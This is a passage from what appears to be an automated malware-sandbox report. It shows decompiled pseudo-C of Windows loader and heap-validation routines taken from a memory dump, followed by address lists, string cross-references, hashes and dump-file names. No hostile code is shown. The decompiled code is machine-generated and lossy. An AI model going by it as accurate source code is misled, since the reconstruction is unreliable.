						_t226 = E00B6CC91(_v1164, _a12, _v1076,  &_v1068);
						_t288 = _t226;
						if(_t226 < 0) {
							E00B93F92(0x33, 0, "SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx\n", _t288);
						} else {
							_t288 = 0;
						}
						goto L18;
					}
					_v1076 = 0;
					_t294 =  *((intOrPtr*)(_t191 + 0x50));
					_v1152 = _t294;
					_v1150 = _t294;
					_v1148 =  *((intOrPtr*)(_t191 + 0x54)) + _t282;
					_v1108 = 0;
					_v1106 = 0x216;
					_v1104 =  &_v544;
					_v1120 = _t272;
					_v1116 = _t286;
					_v1112 = 0;
					_v1100 = 0;
					_v1092 = 0;
					_v1096 = 0;
					_v1132(1,  &_v1120, _v1140);
					if(_v1092 != 0) {
						_t288 = 0xc0000120;
						goto L20;
					}
					if(_v1100 != 0) {
						_t288 = E00B6D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
						if(_t288 >= 0) {
							_t288 = E00B6CC91(_v1164, _t286,  &_v1108,  &_v1068);
							if(_t288 >= 0) {
								_t288 = 0;
								goto L20;
							}
							_push(_t288);
							_push(_t286);
							_push("SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx\n");
							L50:
							_push(0);
							_push(0x33);
							E00B93F92();
							goto L20;
						}
						_push(_t288);
						_push( &_v1108);
						_push("SXS: Attempt to probe known root of assembly storage (\"%wZ\") failed; Status = 0x%08lx\n");
						goto L50;
					}
					_v1144 = _v1112;
					_t250 = _v1096;
					_t286 = 0;
					_v1080 = _t250;
					_v1069 = 1;
					if(_t250 <= 0) {
						L14:
						if(_t286 == _v1080) {
							L59:
							_push(_t286);
							E00B93F92(0x33, 0, "SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries\n",  &_v1152);
							_t288 = 0xc0150004;
							goto L19;
						}
						goto L15;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						_v1120 = _v1144;
						_v1108 = 0;
						_v1106 = 0x216;
						_v1104 =  &_v544;
						_v1116 = _t286;
						_v1112 = 0;
						_v1111 = 0;
						_v1132(2,  &_v1120, _v1140);
						if(_v1112 != 0) {
							break;
						}
						if(_v1111 != 0) {
							if(_v1108 == 0) {
								goto L59;
							}
							_t159 = _t286 + 1; // 0x1
							_v1080 = _t159;
						}
						if(_v1108 != 0) {
							if(_v1068 != 0) {
								E00B3F9F0(_v1068);
								_v1068 = 0;
							}
							_t288 = E00B6D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
							if(_t288 >= 0) {
								goto L14;
							} else {
								if(_t288 == 0xc0150004) {
									goto L13;
								} else {
									_push(_t288);
									_push( &_v1152);
									E00B93F92(0x33, 0, "SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx\n",  &_v1108);
									goto L19;
								}
								goto L27;
							}
						}
						L13:
						_t286 = _t286 + 1;
						if(_t286 < _v1080) {
							continue;
						}
						goto L14;
					}
					_t288 = 0xc0000120;
					goto L19;
				}
			}
































































                                                        0x00b6c5fb
                                                        0x00b6c602
                                                        0x00b6c608
                                                        0x00b6c60b
                                                        0x00b6c60e
                                                        0x00b6c617
                                                        0x00b6c61f
                                                        0x00b6c62e
                                                        0x00b6c63c
                                                        0x00b6c642
                                                        0x00b6c644
                                                        0x00b6c647
                                                        0x00b6c64a
                                                        0x00b6c650
                                                        0x00b6c656
                                                        0x00b6c65c
                                                        0x00b6c662
                                                        0x00b6c669
                                                        0x00b6c670
                                                        0x00b6c676
                                                        0x00b6c67d
                                                        0x00b6c684
                                                        0x00b6c68a
                                                        0x00b6c692
                                                        0x00ba557b
                                                        0x00ba557d
                                                        0x00ba557d
                                                        0x00ba557e
                                                        0x00ba557f
                                                        0x00ba5580
                                                        0x00ba558e
                                                        0x00ba5596
                                                        0x00b6c874
                                                        0x00b6c87a
                                                        0x00b6c89d
                                                        0x00b6c8a3
                                                        0x00ba55a6
                                                        0x00ba55a6
                                                        0x00b6c8af
                                                        0x00ba55b7
                                                        0x00ba55b7
                                                        0x00b6c8bb
                                                        0x00b822ee
                                                        0x00b822ee
                                                        0x00b6c8c1
                                                        0x00b6c8d1
                                                        0x00b6c8d1
                                                        0x00b6c87c
                                                        0x00b6c888
                                                        0x00b6c897
                                                        0x00000000
                                                        0x00b6c897
                                                        0x00b6c69a
                                                        0x00b822f8
                                                        0x00000000
                                                        0x00b6c6b2
                                                        0x00b6c6b8
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c6c6
                                                        0x00b6c6d4
                                                        0x00b6c6d6
                                                        0x00b6c6d9
                                                        0x00b6c6e1
                                                        0x00ba5384
                                                        0x00ba538e
                                                        0x00ba5396
                                                        0x00ba5396
                                                        0x00000000
                                                        0x00ba5396
                                                        0x00b6c6eb
                                                        0x00b82196
                                                        0x00b8219c
                                                        0x00b821a5
                                                        0x00b821a7
                                                        0x00b821ad
                                                        0x00ba53a0
                                                        0x00000000
                                                        0x00ba53a0
                                                        0x00b821b6
                                                        0x00b821bc
                                                        0x00b821bf
                                                        0x00ba53aa
                                                        0x00000000
                                                        0x00ba53aa
                                                        0x00b821cd
                                                        0x00b821d8
                                                        0x00ba53bc
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba53c2
                                                        0x00ba53c9
                                                        0x00ba53cf
                                                        0x00ba53d7
                                                        0x00ba53e9
                                                        0x00000000
                                                        0x00ba53e9
                                                        0x00ba53d9
                                                        0x00000000
                                                        0x00ba53d9
                                                        0x00b821de
                                                        0x00b821de
                                                        0x00b821f4
                                                        0x00b82204
                                                        0x00b82206
                                                        0x00b82211
                                                        0x00b82217
                                                        0x00b6c841
                                                        0x00b6c847
                                                        0x00b8223e
                                                        0x00ba5405
                                                        0x00ba540d
                                                        0x00000000
                                                        0x00ba540d
                                                        0x00b8224a
                                                        0x00b82250
                                                        0x00b82259
                                                        0x00ba552f
                                                        0x00ba553b
                                                        0x00b8225f
                                                        0x00b8225f
                                                        0x00b8225f
                                                        0x00b8226b
                                                        0x00b82271
                                                        0x00b82279
                                                        0x00b8227f
                                                        0x00b82287
                                                        0x00b8228e
                                                        0x00b8228f
                                                        0x00b8229b
                                                        0x00b822a5
                                                        0x00b822af
                                                        0x00b822b5
                                                        0x00b822c0
                                                        0x00b822c9
                                                        0x00b822d0
                                                        0x00000000
                                                        0x00b822d6
                                                        0x00ba554c
                                                        0x00ba5558
                                                        0x00000000
                                                        0x00ba555d
                                                        0x00b822d0
                                                        0x00b6c84d
                                                        0x00b6c863
                                                        0x00b6c868
                                                        0x00b6c86c
                                                        0x00ba556e
                                                        0x00b6c872
                                                        0x00b6c872
                                                        0x00b6c872
                                                        0x00000000
                                                        0x00b6c86c
                                                        0x00b6c6f7
                                                        0x00b6c6fd
                                                        0x00b6c701
                                                        0x00b6c708
                                                        0x00b6c714
                                                        0x00b6c71c
                                                        0x00b6c728
                                                        0x00b6c735
                                                        0x00b6c744
                                                        0x00b6c74a
                                                        0x00b6c750
                                                        0x00b6c756
                                                        0x00b6c75c
                                                        0x00b6c762
                                                        0x00b6c768
                                                        0x00b6c774
                                                        0x00ba5417
                                                        0x00000000
                                                        0x00ba5417
                                                        0x00b6c780
                                                        0x00ba5451
                                                        0x00ba5455
                                                        0x00ba548e
                                                        0x00ba5492
                                                        0x00ba549d
                                                        0x00000000
                                                        0x00ba549d
                                                        0x00ba5494
                                                        0x00ba5495
                                                        0x00ba5496
                                                        0x00ba5464
                                                        0x00ba5464
                                                        0x00ba5465
                                                        0x00ba5467
                                                        0x00000000
                                                        0x00ba546c
                                                        0x00ba5457
                                                        0x00ba545e
                                                        0x00ba545f
                                                        0x00000000
                                                        0x00ba545f
                                                        0x00b6c78c
                                                        0x00b6c792
                                                        0x00b6c798
                                                        0x00b6c79a
                                                        0x00b6c7a0
                                                        0x00b6c7a9
                                                        0x00b6c835
                                                        0x00b6c83b
                                                        0x00ba54df
                                                        0x00ba54df
                                                        0x00ba54ef
                                                        0x00ba54f7
                                                        0x00000000
                                                        0x00ba54f7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c7af
                                                        0x00b6c7af
                                                        0x00b6c7bb
                                                        0x00b6c7c3
                                                        0x00b6c7cf
                                                        0x00b6c7dc
                                                        0x00b6c7eb
                                                        0x00b6c7f1
                                                        0x00b6c7f7
                                                        0x00b6c7fd
                                                        0x00b6c809
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c815
                                                        0x00ba54ab
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba54ad
                                                        0x00ba54b0
                                                        0x00ba54b0
                                                        0x00b6c822
                                                        0x00b6d03e
                                                        0x00ba54c1
                                                        0x00ba54c6
                                                        0x00ba54c6
                                                        0x00b6d074
                                                        0x00b6d078
                                                        0x00000000
                                                        0x00b6d07e
                                                        0x00ba54d7
                                                        0x00000000
                                                        0x00ba54dd
                                                        0x00ba550b
                                                        0x00ba5512
                                                        0x00ba5522
                                                        0x00000000
                                                        0x00ba5527
                                                        0x00000000
                                                        0x00ba54d7
                                                        0x00b6d078
                                                        0x00b6c828
                                                        0x00b6c828
                                                        0x00b6c82f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c82f
                                                        0x00ba5501
                                                        0x00000000
                                                        0x00ba5501

                                                        Strings
                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00BA5566
                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 00BA5581
                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00BA5386
                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00BA54E7
                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00BA5586
                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00BA5550
                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00BA551A
                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00BA545F
                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00BA5496
                                                        • @, xrefs: 00B822A5
                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00BA53FD
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                        • API String ID: 0-4009184096
                                                        • Opcode ID: ddb0b37af42847ab67ac48456f5d5b07dc1fd92055d8fb3b8431d4931cb761ed
                                                        • Instruction ID: 661c1a94d9415cd7f6a0aadaa870046b9a3adacef26f782019fcff749921fe3f
                                                        • Opcode Fuzzy Hash: ddb0b37af42847ab67ac48456f5d5b07dc1fd92055d8fb3b8431d4931cb761ed
                                                        • Instruction Fuzzy Hash: CD022CF1D046289FDB30DF548C80BAAB7F8AB59304F4541EAE649A7212E6309F84DF59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00BEFDDD, Relevance: 12.0, Strings: 9, Instructions: 799COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00BEFDDD(signed int _a4, signed int _a8, intOrPtr* _a16, signed int* _a20, signed int* _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t339;
				intOrPtr _t361;
				signed int _t365;
				signed short _t377;
				signed char _t380;
				signed int* _t382;
				signed char _t383;
				signed int _t384;
				intOrPtr _t386;
				unsigned int _t401;
				signed int _t402;
				intOrPtr _t409;
				intOrPtr _t423;
				signed int _t450;
				intOrPtr _t452;
				intOrPtr* _t463;
				signed int _t465;
				signed int* _t466;
				signed int _t467;
				intOrPtr _t468;
				signed short _t469;
				signed int _t471;
				signed int _t472;
				signed int _t475;
				signed short* _t486;
				signed short _t487;
				signed int* _t489;
				signed int _t490;
				signed int _t498;
				signed int _t501;
				signed int _t502;
				signed int _t511;
				signed short _t513;
				signed short _t514;
				signed int _t515;
				signed int* _t519;
				signed int _t523;
				signed int _t532;
				signed int _t534;
				signed int* _t535;
				signed int _t537;
				void* _t539;
				signed int _t549;
				signed int _t551;
				intOrPtr _t557;
				intOrPtr _t561;
				signed int _t570;
				intOrPtr* _t582;
				signed int _t583;
				signed int* _t584;
				void* _t585;
				signed int _t586;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				signed int _t592;
				signed int* _t594;
				signed short _t595;
				signed short _t597;
				signed int _t604;
				signed int _t605;
				signed int _t607;
				signed short _t609;
				signed short _t611;
				signed int _t613;
				signed int _t615;
				signed int _t616;
				signed int _t621;
				signed int _t622;
				signed int _t623;
				intOrPtr _t626;
				signed int* _t627;
				intOrPtr _t628;
				signed int _t630;
				signed int* _t632;
				signed int _t633;
				signed int _t634;
				signed int _t636;
				signed int _t638;
				signed int* _t642;
				signed short _t643;
				signed short _t645;
				signed int _t646;
				void* _t650;
				signed int _t652;
				signed int _t654;
				signed int* _t656;
				signed short _t664;
				signed short _t667;
				intOrPtr _t668;
				intOrPtr _t669;
				signed int _t670;
				signed int _t671;
				void* _t690;

				_t671 = _a8;
				_t339 = 0;
				_v32 = 0;
				_v36 = 0;
				_v24 = 0;
				if(_t671 >=  *((intOrPtr*)(_t671 + 0x28))) {
					L176:
					_t668 = _v32;
					__eflags =  *((intOrPtr*)(_t671 + 0x2c)) - _t668;
					if( *((intOrPtr*)(_t671 + 0x2c)) == _t668) {
						_t669 = _v36;
						__eflags =  *((intOrPtr*)(_t671 + 0x30)) - _t669;
						if( *((intOrPtr*)(_t671 + 0x30)) == _t669) {
							goto L203;
						}
						_t557 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *((intOrPtr*)(_t557 + 0xc)) - _t339;
						if( *((intOrPtr*)(_t557 + 0xc)) == _t339) {
							_push("HEAP: ");
							E00B9373B();
						} else {
							E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_t669);
						_push( *((intOrPtr*)(_t671 + 0x30)));
						_push(_t671);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L211:
						E00B9373B();
						goto L186;
					}
					_t561 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
					__eflags =  *((intOrPtr*)(_t561 + 0xc)) - _t339;
					if( *((intOrPtr*)(_t561 + 0xc)) == _t339) {
						_push("HEAP: ");
						E00B9373B();
					} else {
						E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t668);
					_push( *((intOrPtr*)(_t671 + 0x2c)));
					_push(_t671);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L211;
				} else {
					_t670 = _a4;
					do {
						_t532 = 0;
						 *_a24 = _t671;
						if( *(_t670 + 0x4c) != 0) {
							 *_t671 =  *_t671 ^  *(_t670 + 0x50);
							_t679 =  *(_t671 + 3) - ( *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671);
							if( *(_t671 + 3) != ( *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671)) {
								_push(0);
								_push(_t671);
								_push(_t670);
								E00BEF8EE(0, _t670, _t671, _t679);
							}
						}
						if(_v24 != ( *(_t671 + 4) ^  *(_t670 + 0x54))) {
							_t361 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *((intOrPtr*)(_t361 + 0xc)) - _t532;
							if( *((intOrPtr*)(_t361 + 0xc)) == _t532) {
								_push("HEAP: ");
								E00B9373B();
							} else {
								E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v24 & 0x0000ffff);
							_t365 =  *(_t671 + 4) & 0x0000ffff ^  *(_t670 + 0x54) & 0x0000ffff;
							__eflags = _t365;
							_push(_t365);
							E00B9373B("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t671);
							L183:
							_t690 =  *(_t670 + 0x4c) - _t532;
							L184:
							if(_t690 != 0) {
								 *(_t671 + 3) =  *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671;
								 *_t671 =  *_t671 ^  *(_t670 + 0x50);
							}
							L186:
							return 0;
						}
						_t377 =  *_t671 & 0x0000ffff;
						_v24 = _t377 & 0x0000ffff;
						_t568 = _t377 & 0x0000ffff;
						_a4 = _t568 << 3;
						_t380 =  *(_t671 + 2);
						if((_t380 & 0x00000001) == 0) {
							__eflags =  *(_t670 + 0x40) & 0x00000040;
							if(( *(_t670 + 0x40) & 0x00000040) == 0) {
								L154:
								 *_a16 =  *_a16 + 1;
								_t382 = _a20;
								 *_t382 =  *_t382 + ( *_t671 & 0x0000ffff);
								__eflags =  *_t382;
								L155:
								_t383 =  *(_t671 + 6);
								__eflags = _t383;
								if(_t383 == 0) {
									_t384 = _t670;
								} else {
									_t384 = (_t671 & 0xffff0000) - ((_t383 & 0x000000ff) << 0x10) + 0x10000;
								}
								_t570 = _a8;
								__eflags = _t384 - _t570;
								if(_t384 != _t570) {
									_t386 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *((intOrPtr*)(_t386 + 0xc)) - _t532;
									if( *((intOrPtr*)(_t386 + 0xc)) == _t532) {
										_push("HEAP: ");
										E00B9373B();
									} else {
										E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *(_t671 + 6) & 0x000000ff);
									_push(_t671);
									_push("Heap block at %p has incorrect segment offset (%x)\n");
									goto L195;
								} else {
									__eflags =  *((char*)(_t671 + 7)) - 3;
									if( *((char*)(_t671 + 7)) != 3) {
										__eflags =  *(_t670 + 0x4c) - _t532;
										if( *(_t670 + 0x4c) != _t532) {
											 *(_t671 + 3) =  *(_t671 + 1) ^  *_t671 ^  *(_t671 + 2);
											 *_t671 =  *_t671 ^  *(_t670 + 0x50);
											__eflags =  *_t671;
										}
										_t671 = _t671 + _a4;
										__eflags = _t671;
										goto L174;
									}
									_t401 =  *(_t671 + 0x1c);
									__eflags = _t401 - _t532;
									if(_t401 == _t532) {
										_t402 =  *_t671 & 0x0000ffff;
										__eflags = _t671 + _t402 * 8 -  *((intOrPtr*)(_t570 + 0x28));
										if(_t671 + _t402 * 8 ==  *((intOrPtr*)(_t570 + 0x28))) {
											__eflags =  *(_t670 + 0x4c) - _t532;
											if( *(_t670 + 0x4c) != _t532) {
												 *(_t671 + 3) =  *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671;
												 *_t671 =  *_t671 ^  *(_t670 + 0x50);
												__eflags =  *_t671;
											}
											L203:
											return 1;
										}
										_t409 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *((intOrPtr*)(_t409 + 0xc)) - _t532;
										if( *((intOrPtr*)(_t409 + 0xc)) == _t532) {
											_push("HEAP: ");
											E00B9373B();
										} else {
											E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *((intOrPtr*)(_a8 + 0x28)));
										_push(_t671);
										_push("Heap block at %p is not last block in segment (%p)\n");
										L195:
										E00B9373B();
										goto L183;
									}
									_v36 = _v36 + 1;
									_v32 = _v32 + (_t401 >> 0xc);
									__eflags =  *(_t670 + 0x4c) - _t532;
									if( *(_t670 + 0x4c) != _t532) {
										 *(_t671 + 3) =  *(_t671 + 1) ^  *_t671 ^  *(_t671 + 2);
										 *_t671 =  *_t671 ^  *(_t670 + 0x50);
										__eflags =  *_t671;
									}
									_t671 = _t671 +  *(_t671 + 0x1c) + 0x20;
									__eflags = _t671 -  *((intOrPtr*)(_t570 + 0x28));
									if(_t671 ==  *((intOrPtr*)(_t570 + 0x28))) {
										L170:
										_v24 = _t532;
										goto L174;
									} else {
										__eflags =  *(_t670 + 0x4c) - _t532;
										if( *(_t670 + 0x4c) != _t532) {
											 *_t671 =  *_t671 ^  *(_t670 + 0x50);
											__eflags =  *(_t671 + 3) - ( *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671);
											if(__eflags != 0) {
												_push(_t532);
												_push(_t671);
												_push(_t670);
												E00BEF8EE(_t532, _t670, _t671, __eflags);
											}
										}
										__eflags =  *(_t671 + 4) ^  *(_t670 + 0x54);
										if(( *(_t671 + 4) ^  *(_t670 + 0x54)) != 0) {
											_t423 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
											__eflags =  *((intOrPtr*)(_t423 + 0xc)) - _t532;
											if( *((intOrPtr*)(_t423 + 0xc)) == _t532) {
												_push("HEAP: ");
												E00B9373B();
											} else {
												E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
											}
											_push( *(_t671 + 4) & 0x0000ffff ^  *(_t670 + 0x54) & 0x0000ffff);
											_push(_t671);
											_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
											goto L195;
										} else {
											__eflags =  *(_t670 + 0x4c) - _t532;
											if( *(_t670 + 0x4c) != _t532) {
												 *(_t671 + 3) =  *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671;
												 *_t671 =  *_t671 ^  *(_t670 + 0x50);
												__eflags =  *_t671;
											}
											goto L170;
										}
									}
								}
							}
							__eflags = _t380 & 0x00000004;
							if((_t380 & 0x00000004) == 0) {
								goto L154;
							}
							_t534 = _a4 + 0xfffffff0;
							__eflags = _t380 & 0x00000002;
							if((_t380 & 0x00000002) != 0) {
								__eflags = _t534 - 4;
								if(_t534 > 4) {
									_t534 = _t534 - 4;
									__eflags = _t534;
								}
							}
							__eflags = _t380 & 0x00000008;
							if((_t380 & 0x00000008) == 0) {
								_t450 = E00B78950(_t671 + 0x10, _t534, 0xfeeefeee);
								_v40 = _t450;
								__eflags = _t450 - _t534;
								if(_t450 != _t534) {
									_t452 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *(_t452 + 0xc);
									if( *(_t452 + 0xc) == 0) {
										_push("HEAP: ");
										E00B9373B();
									} else {
										E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push(_t671 + 8 + _v40);
									E00B9373B("Free Heap block %p modified at %p after it was freed\n", _t671);
									__eflags =  *(_t670 + 0x4c);
									goto L184;
								}
								_t532 = 0;
								__eflags = 0;
								goto L154;
							} else {
								_t535 =  *(_t671 + 0xc);
								_t463 = _t671 + 8;
								_t627 =  *_t463;
								_v12 = _t627;
								_t628 =  *((intOrPtr*)(_t627 + 4));
								_v40 = _t535;
								_t536 =  *_t535;
								__eflags = _t536 - _t628;
								if(__eflags != 0) {
									L61:
									_push(0);
									_push(_t536);
									_push(_t628);
									_push(_t463);
									_push(_t670);
									_push(0xc);
									E00BEF840(_t536, _t568, _t628, _t670, _t671, __eflags);
									goto L174;
								}
								__eflags = _t536 - _t463;
								if(__eflags != 0) {
									goto L61;
								}
								_t465 =  *(_t670 + 0xb8);
								 *((intOrPtr*)(_t670 + 0x78)) =  *((intOrPtr*)(_t670 + 0x78)) - _t568;
								__eflags = _t465;
								if(_t465 == 0) {
									L58:
									_t466 = _v12;
									_t582 = _v40;
									 *_t582 = _t466;
									 *((intOrPtr*)(_t466 + 4)) = _t582;
									__eflags =  *(_t671 + 2) & 0x00000008;
									if(__eflags == 0) {
										L62:
										_t537 =  *_t671 & 0x0000ffff;
										 *(_t671 + 2) = 0;
										 *((char*)(_t671 + 7)) = 0;
										_t467 =  *(_t670 + 0xb8);
										_v20 = _t537;
										__eflags = _t467;
										if(_t467 != 0) {
											while(1) {
												__eflags = _t537 -  *((intOrPtr*)(_t467 + 4));
												if(_t537 <  *((intOrPtr*)(_t467 + 4))) {
													break;
												}
												_t583 =  *_t467;
												__eflags = _t583;
												if(_t583 == 0) {
													_t630 =  *((intOrPtr*)(_t467 + 4)) - 1;
													__eflags = _t630;
													_v28 = _t630;
													L75:
													_t584 = _t467 + 0x14;
													while(1) {
														_a4 = _t467;
														_v16 = _t630 -  *_t584;
														_t632 =  *((intOrPtr*)(_t467 + 0x18));
														_t468 =  *((intOrPtr*)(_t632 + 4));
														_v12 = _t632;
														__eflags = _t632 - _t468;
														if(_t632 != _t468) {
															goto L78;
														}
														L77:
														_v8 = _t632;
														L121:
														_t472 = _v8;
														__eflags = _t472;
														if(_t472 != 0) {
															L64:
															_t107 = _t670 + 0xc4; // 0xc5
															_t539 = _t107;
															__eflags = _t539 - _t472;
															if(_t539 == _t472) {
																L126:
																_t634 =  *(_t472 + 4);
																_t585 =  *_t634;
																__eflags = _t585 - _t472;
																if(_t585 != _t472) {
																	__eflags = 0;
																	_push(0);
																	_push(_t585);
																	_push(0);
																	_push(_t472);
																	_push(0);
																	_push(0xc);
																	E00BEF840(_t539, _t585, 0, _t670, _t671, 0);
																} else {
																	_t594 = _t671 + 8;
																	 *_t594 = _t472;
																	_t594[1] = _t634;
																	 *_t634 = _t594;
																	 *(_t472 + 4) = _t594;
																}
																 *((intOrPtr*)(_t670 + 0x78)) =  *((intOrPtr*)(_t670 + 0x78)) + ( *_t671 & 0x0000ffff);
																_t475 =  *(_t670 + 0xb8);
																__eflags = _t475;
																if(_t475 == 0) {
																	L150:
																	__eflags =  *(_t670 + 0x4c);
																	if( *(_t670 + 0x4c) != 0) {
																		 *(_t671 + 3) =  *(_t671 + 1) ^  *_t671 ^  *(_t671 + 2);
																		 *_t671 =  *_t671 ^  *(_t670 + 0x50);
																	}
																	goto L174;
																} else {
																	_t586 =  *_t671 & 0x0000ffff;
																	while(1) {
																		__eflags = _t586 -  *((intOrPtr*)(_t475 + 4));
																		if(_t586 <  *((intOrPtr*)(_t475 + 4))) {
																			break;
																		}
																		_t636 =  *_t475;
																		__eflags = _t636;
																		if(_t636 == 0) {
																			_t638 =  *((intOrPtr*)(_t475 + 4)) - 1;
																			__eflags = _t638;
																			L136:
																			_t588 = _t638 -  *((intOrPtr*)(_t475 + 0x14));
																			__eflags =  *(_t475 + 8);
																			_v28 = _t588;
																			if( *(_t475 + 8) != 0) {
																				_t588 = _t588 + _t588;
																				__eflags = _t588;
																			}
																			 *((intOrPtr*)(_t475 + 0xc)) =  *((intOrPtr*)(_t475 + 0xc)) + 1;
																			_t589 = _t588 << 2;
																			_a4 = _t589;
																			_t590 =  *(_t589 +  *((intOrPtr*)(_t475 + 0x20)));
																			_v40 = _t590;
																			__eflags = _t638 -  *((intOrPtr*)(_t475 + 4)) - 1;
																			if(_t638 ==  *((intOrPtr*)(_t475 + 4)) - 1) {
																				_t207 = _t475 + 0x10;
																				 *_t207 =  *(_t475 + 0x10) + 1;
																				__eflags =  *_t207;
																			}
																			__eflags = _t590;
																			if(_t590 == 0) {
																				L147:
																				 *((intOrPtr*)(_a4 +  *((intOrPtr*)(_t475 + 0x20)))) = _t671 + 8;
																				_t590 = _v40;
																				goto L148;
																			} else {
																				__eflags =  *(_t670 + 0x4c);
																				if( *(_t670 + 0x4c) == 0) {
																					_t643 =  *(_t590 - 8) & 0x0000ffff;
																				} else {
																					_t645 =  *(_t590 - 8);
																					__eflags =  *(_t670 + 0x4c) & _t645;
																					if(( *(_t670 + 0x4c) & _t645) != 0) {
